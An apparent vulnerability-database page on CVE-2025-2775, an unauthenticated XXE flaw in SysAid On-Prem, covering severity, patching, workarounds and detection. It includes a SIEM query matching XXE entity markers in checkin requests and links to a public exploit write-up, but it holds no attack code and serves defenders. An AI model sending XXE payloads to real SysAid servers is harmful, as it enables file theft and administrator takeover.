CVE-2025-2775 – SysAid On-Prem versions up to 23.3.40 contain a... (How to Fix)

Q: How do I fix CVE-2025-2775?

1. Backup current SysAid installation and database. 2. Download and install SysAid version 23.3.41 or later from official vendor portal. 3. Follow vendor upgrade documentation. 4. Restart SysAid services. 5. Verify successful upgrade.

Q: What is the severity of CVE-2025-2775?

CVE-2025-2775 has a CVSS score of 9.3 (CRITICAL). SysAid On-Prem versions up to 23.3.40 contain an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality. This allows attackers to read files from the server and potentially take over administrator accounts without authentication. Organizations running vulnerable SysAid On-Prem instances are affected.

📋 TL;DR

SysAid On-Prem versions up to 23.3.40 contain an unauthenticated XML External Entity (XXE) vulnerability in the Checkin processing functionality. This allows attackers to read files from the server and potentially take over administrator accounts without authentication. Organizations running vulnerable SysAid On-Prem instances are affected.

💻 Affected Systems

Products:

SysAid On-Prem

Versions: <= 23.3.40

Operating Systems: All supported OS for SysAid

Default Config Vulnerable: ⚠️ Yes

Notes: Only affects On-Prem deployments, not cloud/SaaS versions. Checkin functionality is typically enabled by default.

📦 What is this software?

Sysaid by Sysaid

View all CVEs affecting Sysaid →

⚠️ Risk & Real-World Impact

🔴

Worst Case

Complete system compromise including administrator account takeover, sensitive file exfiltration, and potential remote code execution leading to full organizational network access.

🟠

Likely Case

Unauthenticated attackers reading sensitive files (configuration files, credentials) and potentially escalating to administrator privileges for further system compromise.

🟢

If Mitigated

Limited impact with proper network segmentation and monitoring, though file read capabilities may still expose sensitive information.

🌐 Internet-Facing: HIGH

🏢 Internal Only: HIGH

🎯 Exploit Status

Public PoC: ⚠️ Yes

Weaponized: CONFIRMED

Unauthenticated Exploit: ⚠️ Yes

Complexity: LOW

Exploitation is straightforward with public proof-of-concept available. CISA has added this to their Known Exploited Vulnerabilities catalog.

🛠️ Fix & Mitigation

✅ Official Fix

Patch Version: 23.3.41 or later

Vendor Advisory: https://documentation.sysaid.com/docs/24-40-60

Restart Required: Yes

Instructions:

1. Backup current SysAid installation and database. 2. Download and install SysAid version 23.3.41 or later from official vendor portal. 3. Follow vendor upgrade documentation. 4. Restart SysAid services. 5. Verify successful upgrade.

🔧 Temporary Workarounds

Disable Checkin Processing

all

Temporarily disable the vulnerable Checkin processing functionality if immediate patching is not possible.

# Requires SysAid configuration modification - consult vendor documentation

Network Access Control

all

Restrict access to SysAid web interface to trusted IP addresses only.

# Configure firewall rules to limit access to SysAid ports (typically 8080, 8443)

🧯 If You Can't Patch

Immediately isolate SysAid servers from internet access and restrict to internal trusted networks only.
Implement strict network monitoring and alerting for XXE attack patterns against SysAid endpoints.

🔍 How to Verify

Check if Vulnerable:

Check SysAid version in administration interface or via version file in installation directory. Versions <= 23.3.40 are vulnerable.

Check Version:

# Check SysAid version via web interface at /sysaid/Login.jsp or check version.txt in installation directory

Verify Fix Applied:

Verify SysAid version is 23.3.41 or later. Test Checkin functionality with safe XXE payloads to confirm remediation.

📡 Detection & Monitoring

Log Indicators:

XML parsing errors in SysAid logs
Unusual file access patterns
Authentication attempts from unexpected sources

Network Indicators:

HTTP POST requests to Checkin endpoints with XML payloads containing external entity references
Outbound connections to attacker-controlled servers from SysAid host

SIEM Query:

source="sysaid" AND (http_method="POST" AND uri="*checkin*" AND content="*<!ENTITY*" OR "*SYSTEM*")

📊 Metadata

CVE ID: CVE-2025-2775

CVSS v3 Score: 9.3 (CRITICAL)

CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L

CWE: CWE-611

EPSS Score: 67.78% exploit probability (98.5th percentile)

CISA KEV: Actively Exploited added Jul 22, 2025

Published: May 7, 2025

Last Updated: October 27, 2025

🔗 References

https://documentation.sysaid.com/docs/24-40-60 Release Notes
https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ Exploit,Third Party Advisory
https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/ Exploit,Third Party Advisory
https://www.cisa.gov/known-exploited-vulnerabilities-catalog?field_cve=CVE-2025-2775 US Government Resource

📤 Share & Export

📄 Export Markdown 📋 Export JSON

🔗 Related Vulnerabilities

If you're affected by CVE-2025-2775, you might also want to check these: